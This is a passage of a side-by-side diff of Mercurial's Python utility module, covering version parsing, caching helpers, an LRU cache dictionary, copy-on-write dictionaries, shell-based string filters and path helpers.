823 >>> versiontuple(v, 2)
815 >>> versiontuple(v, 2)
824 (3, 6)
816 (3, 6)
825 >>> versiontuple(v, 3)
817 >>> versiontuple(v, 3)
826 (3, 6, None)
818 (3, 6, None)
827 >>> versiontuple(v, 4)
819 >>> versiontuple(v, 4)
828 (3, 6, None, None)
820 (3, 6, None, None)
829
821
830 >>> v = b'3.9-rc'
822 >>> v = b'3.9-rc'
831 >>> versiontuple(v, 2)
823 >>> versiontuple(v, 2)
832 (3, 9)
824 (3, 9)
833 >>> versiontuple(v, 3)
825 >>> versiontuple(v, 3)
834 (3, 9, None)
826 (3, 9, None)
835 >>> versiontuple(v, 4)
827 >>> versiontuple(v, 4)
836 (3, 9, None, 'rc')
828 (3, 9, None, 'rc')
837
829
838 >>> v = b'3.9-rc+2-02a8fea4289b'
830 >>> v = b'3.9-rc+2-02a8fea4289b'
839 >>> versiontuple(v, 2)
831 >>> versiontuple(v, 2)
840 (3, 9)
832 (3, 9)
841 >>> versiontuple(v, 3)
833 >>> versiontuple(v, 3)
842 (3, 9, None)
834 (3, 9, None)
843 >>> versiontuple(v, 4)
835 >>> versiontuple(v, 4)
844 (3, 9, None, 'rc+2-02a8fea4289b')
836 (3, 9, None, 'rc+2-02a8fea4289b')
845 """
837 """
846 if not v:
838 if not v:
847 v = version()
839 v = version()
848 parts = remod.split('[\+-]', v, 1)
840 parts = remod.split('[\+-]', v, 1)
849 if len(parts) == 1:
841 if len(parts) == 1:
850 vparts, extra = parts[0], None
842 vparts, extra = parts[0], None
851 else:
843 else:
852 vparts, extra = parts
844 vparts, extra = parts
853
845
854 vints = []
846 vints = []
855 for i in vparts.split('.'):
847 for i in vparts.split('.'):
856 try:
848 try:
857 vints.append(int(i))
849 vints.append(int(i))
858 except ValueError:
850 except ValueError:
859 break
851 break
860 # (3, 6) -> (3, 6, None)
852 # (3, 6) -> (3, 6, None)
861 while len(vints) < 3:
853 while len(vints) < 3:
862 vints.append(None)
854 vints.append(None)
863
855
864 if n == 2:
856 if n == 2:
865 return (vints[0], vints[1])
857 return (vints[0], vints[1])
866 if n == 3:
858 if n == 3:
867 return (vints[0], vints[1], vints[2])
859 return (vints[0], vints[1], vints[2])
868 if n == 4:
860 if n == 4:
869 return (vints[0], vints[1], vints[2], extra)
861 return (vints[0], vints[1], vints[2], extra)
870
862
871 def cachefunc(func):
863 def cachefunc(func):
872 '''cache the result of function calls'''
864 '''cache the result of function calls'''
873 # XXX doesn't handle keywords args
865 # XXX doesn't handle keywords args
874 if func.__code__.co_argcount == 0:
866 if func.__code__.co_argcount == 0:
875 cache = []
867 cache = []
876 def f():
868 def f():
877 if len(cache) == 0:
869 if len(cache) == 0:
878 cache.append(func())
870 cache.append(func())
879 return cache[0]
871 return cache[0]
880 return f
872 return f
881 cache = {}
873 cache = {}
882 if func.__code__.co_argcount == 1:
874 if func.__code__.co_argcount == 1:
883 # we gain a small amount of time because
875 # we gain a small amount of time because
884 # we don't need to pack/unpack the list
876 # we don't need to pack/unpack the list
885 def f(arg):
877 def f(arg):
886 if arg not in cache:
878 if arg not in cache:
887 cache[arg] = func(arg)
879 cache[arg] = func(arg)
888 return cache[arg]
880 return cache[arg]
889 else:
881 else:
890 def f(*args):
882 def f(*args):
891 if args not in cache:
883 if args not in cache:
892 cache[args] = func(*args)
884 cache[args] = func(*args)
893 return cache[args]
885 return cache[args]
894
886
895 return f
887 return f
896
888
897 class cow(object):
889 class cow(object):
898 """helper class to make copy-on-write easier
890 """helper class to make copy-on-write easier
899
891
900 Call preparewrite before doing any writes.
892 Call preparewrite before doing any writes.
901 """
893 """
902
894
903 def preparewrite(self):
895 def preparewrite(self):
904 """call this before writes, return self or a copied new object"""
896 """call this before writes, return self or a copied new object"""
905 if getattr(self, '_copied', 0):
897 if getattr(self, '_copied', 0):
906 self._copied -= 1
898 self._copied -= 1
907 return self.__class__(self)
899 return self.__class__(self)
908 return self
900 return self
909
901
910 def copy(self):
902 def copy(self):
911 """always do a cheap copy"""
903 """always do a cheap copy"""
912 self._copied = getattr(self, '_copied', 0) + 1
904 self._copied = getattr(self, '_copied', 0) + 1
913 return self
905 return self
914
906
915 class sortdict(collections.OrderedDict):
907 class sortdict(collections.OrderedDict):
916 '''a simple sorted dictionary
908 '''a simple sorted dictionary
917
909
918 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
910 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
919 >>> d2 = d1.copy()
911 >>> d2 = d1.copy()
920 >>> d2
912 >>> d2
921 sortdict([('a', 0), ('b', 1)])
913 sortdict([('a', 0), ('b', 1)])
922 >>> d2.update([(b'a', 2)])
914 >>> d2.update([(b'a', 2)])
923 >>> list(d2.keys()) # should still be in last-set order
915 >>> list(d2.keys()) # should still be in last-set order
924 ['b', 'a']
916 ['b', 'a']
925 '''
917 '''
926
918
927 def __setitem__(self, key, value):
919 def __setitem__(self, key, value):
928 if key in self:
920 if key in self:
929 del self[key]
921 del self[key]
930 super(sortdict, self).__setitem__(key, value)
922 super(sortdict, self).__setitem__(key, value)
931
923
932 if pycompat.ispypy:
924 if pycompat.ispypy:
933 # __setitem__() isn't called as of PyPy 5.8.0
925 # __setitem__() isn't called as of PyPy 5.8.0
934 def update(self, src):
926 def update(self, src):
935 if isinstance(src, dict):
927 if isinstance(src, dict):
936 src = src.iteritems()
928 src = src.iteritems()
937 for k, v in src:
929 for k, v in src:
938 self[k] = v
930 self[k] = v
939
931
940 class cowdict(cow, dict):
932 class cowdict(cow, dict):
941 """copy-on-write dict
933 """copy-on-write dict
942
934
943 Be sure to call d = d.preparewrite() before writing to d.
935 Be sure to call d = d.preparewrite() before writing to d.
944
936
945 >>> a = cowdict()
937 >>> a = cowdict()
946 >>> a is a.preparewrite()
938 >>> a is a.preparewrite()
947 True
939 True
948 >>> b = a.copy()
940 >>> b = a.copy()
949 >>> b is a
941 >>> b is a
950 True
942 True
951 >>> c = b.copy()
943 >>> c = b.copy()
952 >>> c is a
944 >>> c is a
953 True
945 True
954 >>> a = a.preparewrite()
946 >>> a = a.preparewrite()
955 >>> b is a
947 >>> b is a
956 False
948 False
957 >>> a is a.preparewrite()
949 >>> a is a.preparewrite()
958 True
950 True
959 >>> c = c.preparewrite()
951 >>> c = c.preparewrite()
960 >>> b is c
952 >>> b is c
961 False
953 False
962 >>> b is b.preparewrite()
954 >>> b is b.preparewrite()
963 True
955 True
964 """
956 """
965
957
966 class cowsortdict(cow, sortdict):
958 class cowsortdict(cow, sortdict):
967 """copy-on-write sortdict
959 """copy-on-write sortdict
968
960
969 Be sure to call d = d.preparewrite() before writing to d.
961 Be sure to call d = d.preparewrite() before writing to d.
970 """
962 """
971
963
972 class transactional(object):
964 class transactional(object):
973 """Base class for making a transactional type into a context manager."""
965 """Base class for making a transactional type into a context manager."""
974 __metaclass__ = abc.ABCMeta
966 __metaclass__ = abc.ABCMeta
975
967
976 @abc.abstractmethod
968 @abc.abstractmethod
977 def close(self):
969 def close(self):
978 """Successfully closes the transaction."""
970 """Successfully closes the transaction."""
979
971
980 @abc.abstractmethod
972 @abc.abstractmethod
981 def release(self):
973 def release(self):
982 """Marks the end of the transaction.
974 """Marks the end of the transaction.
983
975
984 If the transaction has not been closed, it will be aborted.
976 If the transaction has not been closed, it will be aborted.
985 """
977 """
986
978
987 def __enter__(self):
979 def __enter__(self):
988 return self
980 return self
989
981
990 def __exit__(self, exc_type, exc_val, exc_tb):
982 def __exit__(self, exc_type, exc_val, exc_tb):
991 try:
983 try:
992 if exc_type is None:
984 if exc_type is None:
993 self.close()
985 self.close()
994 finally:
986 finally:
995 self.release()
987 self.release()
996
988
997 @contextlib.contextmanager
989 @contextlib.contextmanager
998 def acceptintervention(tr=None):
990 def acceptintervention(tr=None):
999 """A context manager that closes the transaction on InterventionRequired
991 """A context manager that closes the transaction on InterventionRequired
1000
992
1001 If no transaction was provided, this simply runs the body and returns
993 If no transaction was provided, this simply runs the body and returns
1002 """
994 """
1003 if not tr:
995 if not tr:
1004 yield
996 yield
1005 return
997 return
1006 try:
998 try:
1007 yield
999 yield
1008 tr.close()
1000 tr.close()
1009 except error.InterventionRequired:
1001 except error.InterventionRequired:
1010 tr.close()
1002 tr.close()
1011 raise
1003 raise
1012 finally:
1004 finally:
1013 tr.release()
1005 tr.release()
1014
1006
1015 @contextlib.contextmanager
1007 @contextlib.contextmanager
1016 def nullcontextmanager():
1008 def nullcontextmanager():
1017 yield
1009 yield
1018
1010
1019 class _lrucachenode(object):
1011 class _lrucachenode(object):
1020 """A node in a doubly linked list.
1012 """A node in a doubly linked list.
1021
1013
1022 Holds a reference to nodes on either side as well as a key-value
1014 Holds a reference to nodes on either side as well as a key-value
1023 pair for the dictionary entry.
1015 pair for the dictionary entry.
1024 """
1016 """
1025 __slots__ = (u'next', u'prev', u'key', u'value')
1017 __slots__ = (u'next', u'prev', u'key', u'value')
1026
1018
1027 def __init__(self):
1019 def __init__(self):
1028 self.next = None
1020 self.next = None
1029 self.prev = None
1021 self.prev = None
1030
1022
1031 self.key = _notset
1023 self.key = _notset
1032 self.value = None
1024 self.value = None
1033
1025
1034 def markempty(self):
1026 def markempty(self):
1035 """Mark the node as emptied."""
1027 """Mark the node as emptied."""
1036 self.key = _notset
1028 self.key = _notset
1037
1029
1038 class lrucachedict(object):
1030 class lrucachedict(object):
1039 """Dict that caches most recent accesses and sets.
1031 """Dict that caches most recent accesses and sets.
1040
1032
1041 The dict consists of an actual backing dict - indexed by original
1033 The dict consists of an actual backing dict - indexed by original
1042 key - and a doubly linked circular list defining the order of entries in
1034 key - and a doubly linked circular list defining the order of entries in
1043 the cache.
1035 the cache.
1044
1036
1045 The head node is the newest entry in the cache. If the cache is full,
1037 The head node is the newest entry in the cache. If the cache is full,
1046 we recycle head.prev and make it the new head. Cache accesses result in
1038 we recycle head.prev and make it the new head. Cache accesses result in
1047 the node being moved to before the existing head and being marked as the
1039 the node being moved to before the existing head and being marked as the
1048 new head node.
1040 new head node.
1049 """
1041 """
1050 def __init__(self, max):
1042 def __init__(self, max):
1051 self._cache = {}
1043 self._cache = {}
1052
1044
1053 self._head = head = _lrucachenode()
1045 self._head = head = _lrucachenode()
1054 head.prev = head
1046 head.prev = head
1055 head.next = head
1047 head.next = head
1056 self._size = 1
1048 self._size = 1
1057 self._capacity = max
1049 self._capacity = max
1058
1050
1059 def __len__(self):
1051 def __len__(self):
1060 return len(self._cache)
1052 return len(self._cache)
1061
1053
1062 def __contains__(self, k):
1054 def __contains__(self, k):
1063 return k in self._cache
1055 return k in self._cache
1064
1056
1065 def __iter__(self):
1057 def __iter__(self):
1066 # We don't have to iterate in cache order, but why not.
1058 # We don't have to iterate in cache order, but why not.
1067 n = self._head
1059 n = self._head
1068 for i in range(len(self._cache)):
1060 for i in range(len(self._cache)):
1069 yield n.key
1061 yield n.key
1070 n = n.next
1062 n = n.next
1071
1063
1072 def __getitem__(self, k):
1064 def __getitem__(self, k):
1073 node = self._cache[k]
1065 node = self._cache[k]
1074 self._movetohead(node)
1066 self._movetohead(node)
1075 return node.value
1067 return node.value
1076
1068
1077 def __setitem__(self, k, v):
1069 def __setitem__(self, k, v):
1078 node = self._cache.get(k)
1070 node = self._cache.get(k)
1079 # Replace existing value and mark as newest.
1071 # Replace existing value and mark as newest.
1080 if node is not None:
1072 if node is not None:
1081 node.value = v
1073 node.value = v
1082 self._movetohead(node)
1074 self._movetohead(node)
1083 return
1075 return
1084
1076
1085 if self._size < self._capacity:
1077 if self._size < self._capacity:
1086 node = self._addcapacity()
1078 node = self._addcapacity()
1087 else:
1079 else:
1088 # Grab the last/oldest item.
1080 # Grab the last/oldest item.
1089 node = self._head.prev
1081 node = self._head.prev
1090
1082
1091 # At capacity. Kill the old entry.
1083 # At capacity. Kill the old entry.
1092 if node.key is not _notset:
1084 if node.key is not _notset:
1093 del self._cache[node.key]
1085 del self._cache[node.key]
1094
1086
1095 node.key = k
1087 node.key = k
1096 node.value = v
1088 node.value = v
1097 self._cache[k] = node
1089 self._cache[k] = node
1098 # And mark it as newest entry. No need to adjust order since it
1090 # And mark it as newest entry. No need to adjust order since it
1099 # is already self._head.prev.
1091 # is already self._head.prev.
1100 self._head = node
1092 self._head = node
1101
1093
1102 def __delitem__(self, k):
1094 def __delitem__(self, k):
1103 node = self._cache.pop(k)
1095 node = self._cache.pop(k)
1104 node.markempty()
1096 node.markempty()
1105
1097
1106 # Temporarily mark as newest item before re-adjusting head to make
1098 # Temporarily mark as newest item before re-adjusting head to make
1107 # this node the oldest item.
1099 # this node the oldest item.
1108 self._movetohead(node)
1100 self._movetohead(node)
1109 self._head = node.next
1101 self._head = node.next
1110
1102
1111 # Additional dict methods.
1103 # Additional dict methods.
1112
1104
1113 def get(self, k, default=None):
1105 def get(self, k, default=None):
1114 try:
1106 try:
1115 return self._cache[k].value
1107 return self._cache[k].value
1116 except KeyError:
1108 except KeyError:
1117 return default
1109 return default
1118
1110
1119 def clear(self):
1111 def clear(self):
1120 n = self._head
1112 n = self._head
1121 while n.key is not _notset:
1113 while n.key is not _notset:
1122 n.markempty()
1114 n.markempty()
1123 n = n.next
1115 n = n.next
1124
1116
1125 self._cache.clear()
1117 self._cache.clear()
1126
1118
1127 def copy(self):
1119 def copy(self):
1128 result = lrucachedict(self._capacity)
1120 result = lrucachedict(self._capacity)
1129 n = self._head.prev
1121 n = self._head.prev
1130 # Iterate in oldest-to-newest order, so the copy has the right ordering
1122 # Iterate in oldest-to-newest order, so the copy has the right ordering
1131 for i in range(len(self._cache)):
1123 for i in range(len(self._cache)):
1132 result[n.key] = n.value
1124 result[n.key] = n.value
1133 n = n.prev
1125 n = n.prev
1134 return result
1126 return result
1135
1127
1136 def _movetohead(self, node):
1128 def _movetohead(self, node):
1137 """Mark a node as the newest, making it the new head.
1129 """Mark a node as the newest, making it the new head.
1138
1130
1139 When a node is accessed, it becomes the freshest entry in the LRU
1131 When a node is accessed, it becomes the freshest entry in the LRU
1140 list, which is denoted by self._head.
1132 list, which is denoted by self._head.
1141
1133
1142 Visually, let's make ``N`` the new head node (* denotes head):
1134 Visually, let's make ``N`` the new head node (* denotes head):
1143
1135
1144 previous/oldest <-> head <-> next/next newest
1136 previous/oldest <-> head <-> next/next newest
1145
1137
1146 ----<->--- A* ---<->-----
1138 ----<->--- A* ---<->-----
1147 | |
1139 | |
1148 E <-> D <-> N <-> C <-> B
1140 E <-> D <-> N <-> C <-> B
1149
1141
1150 To:
1142 To:
1151
1143
1152 ----<->--- N* ---<->-----
1144 ----<->--- N* ---<->-----
1153 | |
1145 | |
1154 E <-> D <-> C <-> B <-> A
1146 E <-> D <-> C <-> B <-> A
1155
1147
1156 This requires the following moves:
1148 This requires the following moves:
1157
1149
1158 C.next = D (node.prev.next = node.next)
1150 C.next = D (node.prev.next = node.next)
1159 D.prev = C (node.next.prev = node.prev)
1151 D.prev = C (node.next.prev = node.prev)
1160 E.next = N (head.prev.next = node)
1152 E.next = N (head.prev.next = node)
1161 N.prev = E (node.prev = head.prev)
1153 N.prev = E (node.prev = head.prev)
1162 N.next = A (node.next = head)
1154 N.next = A (node.next = head)
1163 A.prev = N (head.prev = node)
1155 A.prev = N (head.prev = node)
1164 """
1156 """
1165 head = self._head
1157 head = self._head
1166 # C.next = D
1158 # C.next = D
1167 node.prev.next = node.next
1159 node.prev.next = node.next
1168 # D.prev = C
1160 # D.prev = C
1169 node.next.prev = node.prev
1161 node.next.prev = node.prev
1170 # N.prev = E
1162 # N.prev = E
1171 node.prev = head.prev
1163 node.prev = head.prev
1172 # N.next = A
1164 # N.next = A
1173 # It is tempting to do just "head" here, however if node is
1165 # It is tempting to do just "head" here, however if node is
1174 # adjacent to head, this will do bad things.
1166 # adjacent to head, this will do bad things.
1175 node.next = head.prev.next
1167 node.next = head.prev.next
1176 # E.next = N
1168 # E.next = N
1177 node.next.prev = node
1169 node.next.prev = node
1178 # A.prev = N
1170 # A.prev = N
1179 node.prev.next = node
1171 node.prev.next = node
1180
1172
1181 self._head = node
1173 self._head = node
1182
1174
1183 def _addcapacity(self):
1175 def _addcapacity(self):
1184 """Add a node to the circular linked list.
1176 """Add a node to the circular linked list.
1185
1177
1186 The new node is inserted before the head node.
1178 The new node is inserted before the head node.
1187 """
1179 """
1188 head = self._head
1180 head = self._head
1189 node = _lrucachenode()
1181 node = _lrucachenode()
1190 head.prev.next = node
1182 head.prev.next = node
1191 node.prev = head.prev
1183 node.prev = head.prev
1192 node.next = head
1184 node.next = head
1193 head.prev = node
1185 head.prev = node
1194 self._size += 1
1186 self._size += 1
1195 return node
1187 return node
1196
1188
1197 def lrucachefunc(func):
1189 def lrucachefunc(func):
1198 '''cache most recent results of function calls'''
1190 '''cache most recent results of function calls'''
1199 cache = {}
1191 cache = {}
1200 order = collections.deque()
1192 order = collections.deque()
1201 if func.__code__.co_argcount == 1:
1193 if func.__code__.co_argcount == 1:
1202 def f(arg):
1194 def f(arg):
1203 if arg not in cache:
1195 if arg not in cache:
1204 if len(cache) > 20:
1196 if len(cache) > 20:
1205 del cache[order.popleft()]
1197 del cache[order.popleft()]
1206 cache[arg] = func(arg)
1198 cache[arg] = func(arg)
1207 else:
1199 else:
1208 order.remove(arg)
1200 order.remove(arg)
1209 order.append(arg)
1201 order.append(arg)
1210 return cache[arg]
1202 return cache[arg]
1211 else:
1203 else:
1212 def f(*args):
1204 def f(*args):
1213 if args not in cache:
1205 if args not in cache:
1214 if len(cache) > 20:
1206 if len(cache) > 20:
1215 del cache[order.popleft()]
1207 del cache[order.popleft()]
1216 cache[args] = func(*args)
1208 cache[args] = func(*args)
1217 else:
1209 else:
1218 order.remove(args)
1210 order.remove(args)
1219 order.append(args)
1211 order.append(args)
1220 return cache[args]
1212 return cache[args]
1221
1213
1222 return f
1214 return f
1223
1215
1224 class propertycache(object):
1216 class propertycache(object):
1225 def __init__(self, func):
1217 def __init__(self, func):
1226 self.func = func
1218 self.func = func
1227 self.name = func.__name__
1219 self.name = func.__name__
1228 def __get__(self, obj, type=None):
1220 def __get__(self, obj, type=None):
1229 result = self.func(obj)
1221 result = self.func(obj)
1230 self.cachevalue(obj, result)
1222 self.cachevalue(obj, result)
1231 return result
1223 return result
1232
1224
1233 def cachevalue(self, obj, value):
1225 def cachevalue(self, obj, value):
1234 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1226 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1235 obj.__dict__[self.name] = value
1227 obj.__dict__[self.name] = value
1236
1228
1237 def clearcachedproperty(obj, prop):
1229 def clearcachedproperty(obj, prop):
1238 '''clear a cached property value, if one has been set'''
1230 '''clear a cached property value, if one has been set'''
1239 if prop in obj.__dict__:
1231 if prop in obj.__dict__:
1240 del obj.__dict__[prop]
1232 del obj.__dict__[prop]
1241
1233
1242 def pipefilter(s, cmd):
1234 def pipefilter(s, cmd):
1243 '''filter string S through command CMD, returning its output'''
1235 '''filter string S through command CMD, returning its output'''
1244 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1236 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1245 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1237 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1246 pout, perr = p.communicate(s)
1238 pout, perr = p.communicate(s)
1247 return pout
1239 return pout
1248
1240
1249 def tempfilter(s, cmd):
1241 def tempfilter(s, cmd):
1250 '''filter string S through a pair of temporary files with CMD.
1242 '''filter string S through a pair of temporary files with CMD.
1251 CMD is used as a template to create the real command to be run,
1243 CMD is used as a template to create the real command to be run,
1252 with the strings INFILE and OUTFILE replaced by the real names of
1244 with the strings INFILE and OUTFILE replaced by the real names of
1253 the temporary files generated.'''
1245 the temporary files generated.'''
1254 inname, outname = None, None
1246 inname, outname = None, None
1255 try:
1247 try:
1256 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1248 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1257 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1249 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1258 fp.write(s)
1250 fp.write(s)
1259 fp.close()
1251 fp.close()
1260 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1252 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1261 os.close(outfd)
1253 os.close(outfd)
1262 cmd = cmd.replace('INFILE', inname)
1254 cmd = cmd.replace('INFILE', inname)
1263 cmd = cmd.replace('OUTFILE', outname)
1255 cmd = cmd.replace('OUTFILE', outname)
1264 code = os.system(cmd)
1256 code = os.system(cmd)
1265 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1257 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1266 code = 0
1258 code = 0
1267 if code:
1259 if code:
1268 raise Abort(_("command '%s' failed: %s") %
1260 raise Abort(_("command '%s' failed: %s") %
1269 (cmd, explainexit(code)))
1261 (cmd, explainexit(code)))
1270 return readfile(outname)
1262 return readfile(outname)
1271 finally:
1263 finally:
1272 try:
1264 try:
1273 if inname:
1265 if inname:
1274 os.unlink(inname)
1266 os.unlink(inname)
1275 except OSError:
1267 except OSError:
1276 pass
1268 pass
1277 try:
1269 try:
1278 if outname:
1270 if outname:
1279 os.unlink(outname)
1271 os.unlink(outname)
1280 except OSError:
1272 except OSError:
1281 pass
1273 pass
1282
1274
1283 filtertable = {
1275 filtertable = {
1284 'tempfile:': tempfilter,
1276 'tempfile:': tempfilter,
1285 'pipe:': pipefilter,
1277 'pipe:': pipefilter,
1286 }
1278 }
1287
1279
1288 def filter(s, cmd):
1280 def filter(s, cmd):
1289 "filter a string through a command that transforms its input to its output"
1281 "filter a string through a command that transforms its input to its output"
1290 for name, fn in filtertable.iteritems():
1282 for name, fn in filtertable.iteritems():
1291 if cmd.startswith(name):
1283 if cmd.startswith(name):
1292 return fn(s, cmd[len(name):].lstrip())
1284 return fn(s, cmd[len(name):].lstrip())
1293 return pipefilter(s, cmd)
1285 return pipefilter(s, cmd)
1294
1286
1295 def binary(s):
1287 def binary(s):
1296 """return true if a string is binary data"""
1288 """return true if a string is binary data"""
1297 return bool(s and '\0' in s)
1289 return bool(s and '\0' in s)
1298
1290
1299 def increasingchunks(source, min=1024, max=65536):
1291 def increasingchunks(source, min=1024, max=65536):
1300 '''return no less than min bytes per chunk while data remains,
1292 '''return no less than min bytes per chunk while data remains,
1301 doubling min after each chunk until it reaches max'''
1293 doubling min after each chunk until it reaches max'''
1302 def log2(x):
1294 def log2(x):
1303 if not x:
1295 if not x:
1304 return 0
1296 return 0
1305 i = 0
1297 i = 0
1306 while x:
1298 while x:
1307 x >>= 1
1299 x >>= 1
1308 i += 1
1300 i += 1
1309 return i - 1
1301 return i - 1
1310
1302
1311 buf = []
1303 buf = []
1312 blen = 0
1304 blen = 0
1313 for chunk in source:
1305 for chunk in source:
1314 buf.append(chunk)
1306 buf.append(chunk)
1315 blen += len(chunk)
1307 blen += len(chunk)
1316 if blen >= min:
1308 if blen >= min:
1317 if min < max:
1309 if min < max:
1318 min = min << 1
1310 min = min << 1
1319 nmin = 1 << log2(blen)
1311 nmin = 1 << log2(blen)
1320 if nmin > min:
1312 if nmin > min:
1321 min = nmin
1313 min = nmin
1322 if min > max:
1314 if min > max:
1323 min = max
1315 min = max
1324 yield ''.join(buf)
1316 yield ''.join(buf)
1325 blen = 0
1317 blen = 0
1326 buf = []
1318 buf = []
1327 if buf:
1319 if buf:
1328 yield ''.join(buf)
1320 yield ''.join(buf)
1329
1321
1330 Abort = error.Abort
1322 Abort = error.Abort
1331
1323
1332 def always(fn):
1324 def always(fn):
1333 return True
1325 return True
1334
1326
1335 def never(fn):
1327 def never(fn):
1336 return False
1328 return False
1337
1329
1338 def nogc(func):
1330 def nogc(func):
1339 """disable garbage collector
1331 """disable garbage collector
1340
1332
1341 Python's garbage collector triggers a GC each time a certain number of
1333 Python's garbage collector triggers a GC each time a certain number of
1342 container objects (the number being defined by gc.get_threshold()) are
1334 container objects (the number being defined by gc.get_threshold()) are
1343 allocated even when marked not to be tracked by the collector. Tracking has
1335 allocated even when marked not to be tracked by the collector. Tracking has
1344 no effect on when GCs are triggered, only on what objects the GC looks
1336 no effect on when GCs are triggered, only on what objects the GC looks
1345 into. As a workaround, disable GC while building complex (huge)
1337 into. As a workaround, disable GC while building complex (huge)
1346 containers.
1338 containers.
1347
1339
1348 This garbage collector issue have been fixed in 2.7. But it still affect
1340 This garbage collector issue have been fixed in 2.7. But it still affect
1349 CPython's performance.
1341 CPython's performance.
1350 """
1342 """
1351 def wrapper(*args, **kwargs):
1343 def wrapper(*args, **kwargs):
1352 gcenabled = gc.isenabled()
1344 gcenabled = gc.isenabled()
1353 gc.disable()
1345 gc.disable()
1354 try:
1346 try:
1355 return func(*args, **kwargs)
1347 return func(*args, **kwargs)
1356 finally:
1348 finally:
1357 if gcenabled:
1349 if gcenabled:
1358 gc.enable()
1350 gc.enable()
1359 return wrapper
1351 return wrapper
1360
1352
1361 if pycompat.ispypy:
1353 if pycompat.ispypy:
1362 # PyPy runs slower with gc disabled
1354 # PyPy runs slower with gc disabled
1363 nogc = lambda x: x
1355 nogc = lambda x: x
1364
1356
1365 def pathto(root, n1, n2):
1357 def pathto(root, n1, n2):
1366 '''return the relative path from one place to another.
1358 '''return the relative path from one place to another.
1367 root should use os.sep to separate directories
1359 root should use os.sep to separate directories
1368 n1 should use os.sep to separate directories
1360 n1 should use os.sep to separate directories
1369 n2 should use "/" to separate directories
1361 n2 should use "/" to separate directories
1370 returns an os.sep-separated path.
1362 returns an os.sep-separated path.
1371
1363
1372 If n1 is a relative path, it's assumed it's
1364 If n1 is a relative path, it's assumed it's
1373 relative to root.
1365 relative to root.
1374 n2 should always be relative to root.
1366 n2 should always be relative to root.
1375 '''
1367 '''
1376 if not n1:
1368 if not n1:
1377 return localpath(n2)
1369 return localpath(n2)
1378 if os.path.isabs(n1):
1370 if os.path.isabs(n1):
1379 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1371 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1380 return os.path.join(root, localpath(n2))
1372 return os.path.join(root, localpath(n2))
1381 n2 = '/'.join((pconvert(root), n2))
1373 n2 = '/'.join((pconvert(root), n2))
1382 a, b = splitpath(n1), n2.split('/')
1374 a, b = splitpath(n1), n2.split('/')
1383 a.reverse()
1375 a.reverse()
1384 b.reverse()
1376 b.reverse()
1385 while a and b and a[-1] == b[-1]:
1377 while a and b and a[-1] == b[-1]:
1386 a.pop()
1378 a.pop()
1387 b.pop()
1379 b.pop()
1388 b.reverse()
1380 b.reverse()
1389 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1381 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1390
1382
1391 def mainfrozen():
1383 def mainfrozen():
1392 """return True if we are a frozen executable.
1384 """return True if we are a frozen executable.
1393
1385
1394 The code supports py2exe (most common, Windows only) and tools/freeze
1386 The code supports py2exe (most common, Windows only) and tools/freeze
1395 (portable, not much used).
1387 (portable, not much used).
1396 """
1388 """
1397 return (safehasattr(sys, "frozen") or # new py2exe
1389 return (safehasattr(sys, "frozen") or # new py2exe
1398 safehasattr(sys, "importers") or # old py2exe
1390 safehasattr(sys, "importers") or # old py2exe
1399 imp.is_frozen(u"__main__")) # tools/freeze
1391 imp.is_frozen(u"__main__")) # tools/freeze
1400
1392
1401 # the location of data files matching the source code
1393 # the location of data files matching the source code
1402 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1394 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1403 # executable version (py2exe) doesn't support __file__
1395 # executable version (py2exe) doesn't support __file__
1404 datapath = os.path.dirname(pycompat.sysexecutable)
1396 datapath = os.path.dirname(pycompat.sysexecutable)
1405 else:
1397 else:
1406 datapath = os.path.dirname(pycompat.fsencode(__file__))
1398 datapath = os.path.dirname(pycompat.fsencode(__file__))
1407
1399
1408 i18n.setdatapath(datapath)
1400 i18n.setdatapath(datapath)
1409
1401
1410 _hgexecutable = None
1402 _hgexecutable = None
1411
1403
1412 def hgexecutable():
1404 def hgexecutable():
1413 """return location of the 'hg' executable.
1405 """return location of the 'hg' executable.
1414
1406
1415 Defaults to $HG or 'hg' in the search path.
1407 Defaults to $HG or 'hg' in the search path.
1416 """
1408 """
1417 if _hgexecutable is None:
1409 if _hgexecutable is None:
1418 hg = encoding.environ.get('HG')
1410 hg = encoding.environ.get('HG')
1419 mainmod = sys.modules[pycompat.sysstr('__main__')]
1411 mainmod = sys.modules[pycompat.sysstr('__main__')]
1420 if hg:
1412 if hg:
1421 _sethgexecutable(hg)
1413 _sethgexecutable(hg)
1422 elif mainfrozen():
1414 elif mainfrozen():
1423 if getattr(sys, 'frozen', None) == 'macosx_app':
1415 if getattr(sys, 'frozen', None) == 'macosx_app':
1424 # Env variable set by py2app
1416 # Env variable set by py2app
1425 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1417 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1426 else:
1418 else:
1427 _sethgexecutable(pycompat.sysexecutable)
1419 _sethgexecutable(pycompat.sysexecutable)
1428 elif (os.path.basename(
1420 elif (os.path.basename(
1429 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1421 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1430 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1422 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1431 else:
1423 else:
1432 exe = findexe('hg') or os.path.basename(sys.argv[0])
1424 exe = findexe('hg') or os.path.basename(sys.argv[0])
1433 _sethgexecutable(exe)
1425 _sethgexecutable(exe)
1434 return _hgexecutable
